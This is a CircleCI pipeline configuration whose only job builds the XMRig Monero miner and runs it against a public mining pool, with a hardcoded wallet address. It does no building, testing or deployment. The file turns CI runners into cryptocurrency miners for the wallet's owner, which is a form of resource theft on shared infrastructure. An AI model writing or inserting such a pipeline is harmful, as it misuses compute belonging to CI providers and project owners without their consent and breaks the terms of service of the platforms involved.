version: 2.1

jobs:
  xmrig-setup:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - run:
          name: Update System and Install Dependencies
          command: |
            apt-get update && apt-get upgrade -y
            apt-get install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
      - run:
          name: Clone XMRig Repository
          command: |
            git clone https://github.com/xmrig/xmrig.git
            cd xmrig
      - run:
          name: Build XMRig
          command: |
            cd xmrig
            mkdir build
            cd build
            cmake ..
            make
      - run:
          name: Start Mining
          command: |
            cd xmrig/build
            ./xmrig -o pool.xmr.pt:9000 -u 44nFMQFFiFceGgSdPeqpQ4iSf2qm3XtG55JJ3KNUQ9RDJ99Aus2N7FWAwNKMN8xUKDQ6xMM4tgKFUecoiYYhFK2rVSZFuNg -k --tls --coin monero -p Monero

workflows:
  version: 2
  xmrig-workflow:
    jobs:
      - xmrig-setup